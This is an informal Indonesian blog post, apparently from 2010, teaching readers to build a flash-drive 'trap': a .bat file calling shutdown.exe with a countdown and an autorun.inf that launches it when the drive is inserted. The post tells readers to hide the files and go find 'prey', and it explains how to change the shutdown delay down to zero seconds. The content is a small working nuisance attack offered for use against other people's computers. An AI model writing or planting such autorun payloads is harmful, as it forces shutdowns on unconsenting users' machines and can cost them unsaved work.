3/10/10

Bikin Jebakan Di FlashDisk - (autorun)

okeh... baru pulang sekolah, dan gue punya ide untuk ngshare gimana cara bikin jebakan shutdown otomatis di flahdisk pake autorun.inf.. hehehe (licik).. cara ini uda sering berhasil, kecuali di komputer gue, ga pernah sama sekalipun berhasil... mw tw caranya biar aman dari autorun?? adaaa deeeh... hehehe, kalian tau kok... okeh kembali ke topik, sambil nyemil t**-t** crush (sensor) + air sebotol.. pertama-tama, kita buat program, eh bukan program juga sih gue bilangnya perintah DOS, pokoknya file berekstensi .bat yang isinya perintah shutdown.. caranya :



MEMBUAT PERINTAH SHUTDOWN

1. Buka notepad
2. Kemudian, kita minum dulu... haus... hehehe
3. di notepad kita tulis seperti ini


%windir%\system32\shutdown.exe -s -t 30


4. Save as file dengan nama shutdown.bat atau sesuka kalian yang penting ekstensinya .bat.

naaah, program pertama jadi... hehe.. sekarang tinggal buat deh autorun nya... siapa yang ga tau cara bikin autorun?? oke sekarang gue kasi tau cara bikin autorunnya... yg uda tau, jangan sombong !! hehehehe...basa basi diit neh ane lg pusing... ny ye ane kasih tau dulu, biasanya itu yang sering saya liat kbanyakan, perintah untuk menjalankan file autorun nya execute, shellexecute, open , dan lupal. kalo kalian suka ngutak-atik CD PC Game, pasti kalian sering th atau bahkan selalu ngliat autorun.inf.. hehe, dari situ kalian bisa belajar sendiri, dan coba-coba.. oke langsung cabut... ikutin langkah berilkutnya ini

MEMBUAT AUTORUN

1. Biasalah, kita buka notepad lagi jangan lupa sambil nyemil, biar ga laper..
2. Terus tulis kaya gini nih

[AutoRun]

open=
namafiletadi.bat ----->nama file sesuai dengan file yang telah kamu buat tadi

contoh, saya save nama filenyang tadi di bahas di atas matiotomatis.bat, jadi begini

[AutoRun]

open=
matiotomatis.bat

4. save as file jadi
autorun.inf


selesai deh... sekarang tinggal taro di flashdisk kamu... dan siap bertarung.. ada beberapa kendala sih jebakan autorun ini, prtama kalo ada antivirus yang rese spt SMADAV pasti autorun kalian akan di backup dan diganti dengan folder SMADAV dengan nama autorun.inf juga.. dan cara nyembuhinnya, ntar saya bahas lain kali... hehe.. dan kedua, tergantung komputernya, apakah autorun di komputer korban jalan atau tidak seperti komputer gue nih... hehehe... okeh misi selesai, tinggal kalian cari mangsa deh... dan jangan lupa di hidden ya... okok..

ada tambahan, perintah "%windir%\system32\shutdown.exe -s -t 30" memberi waktu 30 detik untuk shutdown, lebih tepatnya dalam 30 detik komputer akan shitdown sendiri.. pada perintah di atas "-t 30" adalah waktu yang diperlukan untuk shutdown/ hitung mundur untuk shutdown.. kalian bisa menggantinya dengan angka berapapun, ingat 30 = 30 detik dan jika kamu memasukkan 3600 maka dalam 1 jam komputer akan mati.. kalo kamu mengisi dengan 00 maka komputer akan mati dalam 0 detik.. mudah kan?? hehe..


nah segini dulu ilmunya yang bisa saya berikan, o iya ini ada penangkalnya loh... tapiii, ga gue bahas sekarang.. okok... kalo ada prtanyaan nnya ke ane aja ye..

pegel ga bacanya?? jangan gitu dong... nih saran dari ane jangan pernah merasa capek untuk mendapatkan ilmu, walaupun sesulit dan semudah apapun ilmu itu... :)

0 comments:

Post a Comment

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =))